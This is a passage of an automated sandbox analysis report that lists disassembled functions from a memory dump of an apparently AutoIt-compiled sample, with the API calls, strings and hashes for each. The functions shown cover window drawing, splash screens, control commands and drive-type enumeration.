Instruction ID: b22122a9391a9f25a82b07e21fea019a4eb6cdc844089885969641a728972e80
Opcode Fuzzy Hash: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
Instruction Fuzzy Hash: 7CD09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60

Function 00E2A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E2A12A

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
Instruction ID: 5b5a46477a0c8aed7dd83651fecdb38cdd4e60e6bbb12e351a11ec94d01ae46b
Opcode Fuzzy Hash: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
Instruction Fuzzy Hash: F6A0113000020CAB8A002B82EC08888BFACEB022A0B008020F80C800228B32A8208A80

Function 00E18808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4697dc1a10e53e7a9c76c9d0a345a700404826ee80276c436332f34d32584511
Instruction ID: a4e6a69b5c457d9185a7a4dbfda4e8224b789346571964ffe565ea51ae9faf86
Opcode Fuzzy Hash: 4697dc1a10e53e7a9c76c9d0a345a700404826ee80276c436332f34d32584511
Instruction Fuzzy Hash: 0A224632904506CBCF288A64C6A47FD7BA1FF41309F28A96BD94ABB492DB34DCC5C741

Function 00E221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 08e1d2010b67edf68475b205a1f00dc25462f041d29830877cf7ccee6f5866c0
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: B0C1AA322451B34ADF2D4639E43403EFBA15EA27B631B27ADD4B3EB1D4EE10DA25D610

Function 00E225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 8623e29c660fda2ebaeaaa50957f1f2c366dfc46035b6048000c667b12c12b4a
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 21C176332051B349DF2D4639D43413EBAA15EE27B631B27ADD4B3EB1D4EE10CA25D620

Function 00E21978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 1bdb8a0fb873dcf9955506ab9e1c6c1b0e4b639d491438a5290225f776ba2c8f
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 96C194362450B349DF2D4639A43413EFBA15EB27B631B27EDD4B2EB1C4EE20CA65D610

Function 015804B0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 2307d985fdc0dfaeb4fc67a9fa57e2440d40d0ff1ad2fe94e13869b50e455ab3
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 9641E271D1051CEBDF48CFADC890AEEBBF2AF88201F548299D516AB345D730AB01DB90

Function 01580340 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: e4ea983ea1f981c4b1bc96066feedf79b990358e90d768515e5c65b7701048e4
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: E9014674A11209EFCB44DF98C5909AEF7F5FF48310F208599E915AB741D730AE41DB90

Function 015803A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 328fa29d5edfefce97cf70936de252ec4600e0d6ef6c559e4763d4c1cc781e31
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 0601A874A01209EFCB44DF98C5909AEF7F5FF48310F208599E819AB741D730AE41DB80

Function 0157ED30 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00E77806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E7785B
DeleteObject.GDI32(00000000), ref: 00E7786D
DestroyWindow.USER32 ref: 00E7787B
GetDesktopWindow.USER32 ref: 00E77895
GetWindowRect.USER32(00000000), ref: 00E7789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E779DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E779ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77A35
GetClientRect.USER32(00000000,?), ref: 00E77A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E77A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77ABB
GlobalLock.KERNEL32(00000000), ref: 00E77AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AD3
GlobalUnlock.KERNEL32(00000000), ref: 00E77ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AE3
GlobalFree.KERNEL32(00000000), ref: 00E77AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E92CAC,00000000), ref: 00E77B16
GlobalFree.KERNEL32(00000000), ref: 00E77B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E77B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E77B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77D7A

Strings

, xrefs: 00E77D00
DISPLAY, xrefs: 00E77BDD
AutoIt v3, xrefs: 00E77A2D
static, xrefs: 00E77A75, 00E77BCC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 5747380bb9e105e214de42500bde879e0e03d67bf6510794d86a9b8aa77f3c76
Instruction ID: a62c75c033a8d97ca1d06d1316db26de84a26a5ced57e75ba1bc7d7d618fb963
Opcode Fuzzy Hash: 5747380bb9e105e214de42500bde879e0e03d67bf6510794d86a9b8aa77f3c76
Instruction Fuzzy Hash: BD027B71900215EFDB14DFA5DC89EAEBBB9EF48310F108168F959BB2A1C730AD45CB60

Function 00E8356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00E8F910), ref: 00E83627
IsWindowVisible.USER32(?), ref: 00E8364B

Strings

CHECK, xrefs: 00E8386D
GETLINECOUNT, xrefs: 00E838C6
ADDSTRING, xrefs: 00E83716
CURRENTTAB, xrefs: 00E836BD
HIDEDROPDOWN, xrefs: 00E83700
SHOWDROPDOWN, xrefs: 00E836E0
SELECTSTRING, xrefs: 00E83806
TABRIGHT, xrefs: 00E8369D
GETCURRENTLINE, xrefs: 00E838ED
ISENABLED, xrefs: 00E8366B
ISCHECKED, xrefs: 00E83839
GETCURRENTSELECTION, xrefs: 00E837E3
SENDCOMMANDID, xrefs: 00E839DA
EDITPASTE, xrefs: 00E8395F
ISVISIBLE, xrefs: 00E83637
GETSELECTED, xrefs: 00E838A3
SETCURRENTSELECTION, xrefs: 00E837B6
UNCHECK, xrefs: 00E83883
TABLEFT, xrefs: 00E83687
FINDSTRING, xrefs: 00E83776
GETCURRENTCOL, xrefs: 00E83928
DELSTRING, xrefs: 00E83749
GETLINE, xrefs: 00E8399B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 0f4776ff137c399310870b2e0b2104d6c014f5137e7e60cbc227cdcc2a030811
Instruction ID: 92defa382b990c27fb9a7adaba43cdaa157359235c0e85ae7f53456fbbe92106
Opcode Fuzzy Hash: 0f4776ff137c399310870b2e0b2104d6c014f5137e7e60cbc227cdcc2a030811
Instruction Fuzzy Hash: F8D16E702043019BCB04FF20C552AAE77E5AF95754F546868F88A7B3E3DB21EE4ACB51

Function 00E8A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00E8A630
GetSysColorBrush.USER32(0000000F), ref: 00E8A661
GetSysColor.USER32(0000000F), ref: 00E8A66D
SetBkColor.GDI32(?,000000FF), ref: 00E8A687
SelectObject.GDI32(?,00000000), ref: 00E8A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A6C1
GetSysColor.USER32(00000010), ref: 00E8A6C9
CreateSolidBrush.GDI32(00000000), ref: 00E8A6D0
FrameRect.USER32(?,?,00000000), ref: 00E8A6DF
DeleteObject.GDI32(00000000), ref: 00E8A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00E8A731
FillRect.USER32(?,?,00000000), ref: 00E8A763
GetWindowLongW.USER32(?,000000F0), ref: 00E8A78E

Part of subcall function 00E8A8CA: GetSysColor.USER32(00000012), ref: 00E8A903
Part of subcall function 00E8A8CA: SetTextColor.GDI32(?,?), ref: 00E8A907
Part of subcall function 00E8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00E8A91D
Part of subcall function 00E8A8CA: GetSysColor.USER32(0000000F), ref: 00E8A928
Part of subcall function 00E8A8CA: GetSysColor.USER32(00000011), ref: 00E8A945
Part of subcall function 00E8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A953
Part of subcall function 00E8A8CA: SelectObject.GDI32(?,00000000), ref: 00E8A964
Part of subcall function 00E8A8CA: SetBkColor.GDI32(?,00000000), ref: 00E8A96D
Part of subcall function 00E8A8CA: SelectObject.GDI32(?,?), ref: 00E8A97A
Part of subcall function 00E8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A999
Part of subcall function 00E8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9B0
Part of subcall function 00E8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9C5
Part of subcall function 00E8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8A9ED

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: a46059331de27a6bb2f65aa3270dd087e74aa955f4365ef7352d04f877ab92b9
Instruction ID: 3bb08e8254bc433ca6a5f035f8322c1e0744d1fa8c8950b20a8ec2f3fb3062b1
Opcode Fuzzy Hash: a46059331de27a6bb2f65aa3270dd087e74aa955f4365ef7352d04f877ab92b9
Instruction Fuzzy Hash: B5919F72008301FFDB10AF65DC08A5B7BA9FF88321F141B2AF56AB61A1D731D948DB52

Function 00E02C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00E02CA2
DeleteObject.GDI32(00000000), ref: 00E02CE8
DeleteObject.GDI32(00000000), ref: 00E02CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00E02CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00E02D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E3C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E3C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E3C89D

Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A

SendMessageW.USER32(?,00001053), ref: 00E3C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E3C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3C912

Strings

0, xrefs: 00E3C731

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 34adc39638e1028c6675685389e32e5a19b7830b6b8e953b7911d3270f238914
Instruction ID: d404c6107043c8b4a34442d4d23455168760535994d0717fea51ba04b85d1de0
Opcode Fuzzy Hash: 34adc39638e1028c6675685389e32e5a19b7830b6b8e953b7911d3270f238914
Instruction Fuzzy Hash: 60127F30604201EFDB15CF24C88CBA9BBE5BF45308F646569E959FB2A2C731EC85DB91

Function 00E774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00E774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E7759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E77633
GetClientRect.USER32(00000000,?), ref: 00E7763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E77683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E77692
GetStockObject.GDI32(00000011), ref: 00E776A2
SelectObject.GDI32(00000000,00000000), ref: 00E776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E776BF
DeleteDC.GDI32(00000000), ref: 00E776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00E7770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E77746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E7775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00E7776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E7779B
GetStockObject.GDI32(00000011), ref: 00E777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E777BB

Strings

msctls_progress32, xrefs: 00E7773C
DISPLAY, xrefs: 00E77688
AutoIt v3, xrefs: 00E7762B
static, xrefs: 00E7767D, 00E77795

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 163b8fb06e3fdf1f8fc0d09a785c64436da3d119ac19fc7f40907418f632af04
Instruction ID: 64dda31c5dce07395608681dac5b91639dd946f547d36137014bb2e2696c5e20
Opcode Fuzzy Hash: 163b8fb06e3fdf1f8fc0d09a785c64436da3d119ac19fc7f40907418f632af04
Instruction Fuzzy Hash: B2A16DB1A00605BFEB14DBA5DC4AFAE7BB9EB04710F008124FA19B72E1D771AD45CB64

Function 00E6AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E6AD1E
GetDriveTypeW.KERNEL32(?,00E8FAC0,?,\\.\,00E8F910), ref: 00E6ADFB
SetErrorMode.KERNEL32(00000000,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AF59

Strings

Network, xrefs: 00E6AE39
\\.\, xrefs: 00E6AD70
PhysicalDrive, xrefs: 00E6ADA7
SSD, xrefs: 00E6AE86
ATAPI, xrefs: 00E6AECD
SCSI, xrefs: 00E6AEC6
SATA, xrefs: 00E6AF0C
iSCSI, xrefs: 00E6AEFE
USB, xrefs: 00E6AEF0
FileBackedVirtual, xrefs: 00E6AF28
RAMDisk, xrefs: 00E6AE25
1394, xrefs: 00E6AEDB
CDROM, xrefs: 00E6AE2F
RAID, xrefs: 00E6AEF7
Removable, xrefs: 00E6AE4D
MMC, xrefs: 00E6AF1A
SSA, xrefs: 00E6AEE2
Unknown, xrefs: 00E6AE1B, 00E6AEBF
Fibre, xrefs: 00E6AEE9
Fixed, xrefs: 00E6AE43
SAS, xrefs: 00E6AF05
ATA, xrefs: 00E6AED4
Virtual, xrefs: 00E6AF21

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 77432cd2f72e1b604c58a88e9d960f7b452419d320a99ebf4560ad9f4560e049
Instruction ID: 54f1975fdb77e11e61e83a6967f315fa8eff7d0a0c69af648e5f347ac5988aab
Opcode Fuzzy Hash: 77432cd2f72e1b604c58a88e9d960f7b452419d320a99ebf4560ad9f4560e049
Instruction Fuzzy Hash: 825184B4B842059ACB50DB60EA82CFA73E5EF487847287076E416B7291DA319D41DF53

Function 00E068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E06931
__wcsnicmp.LIBCMT ref: 00E06949
__wcsnicmp.LIBCMT ref: 00E06961
__wcsnicmp.LIBCMT ref: 00E06979
__wcsnicmp.LIBCMT ref: 00E06991
__wcsnicmp.LIBCMT ref: 00E069A9
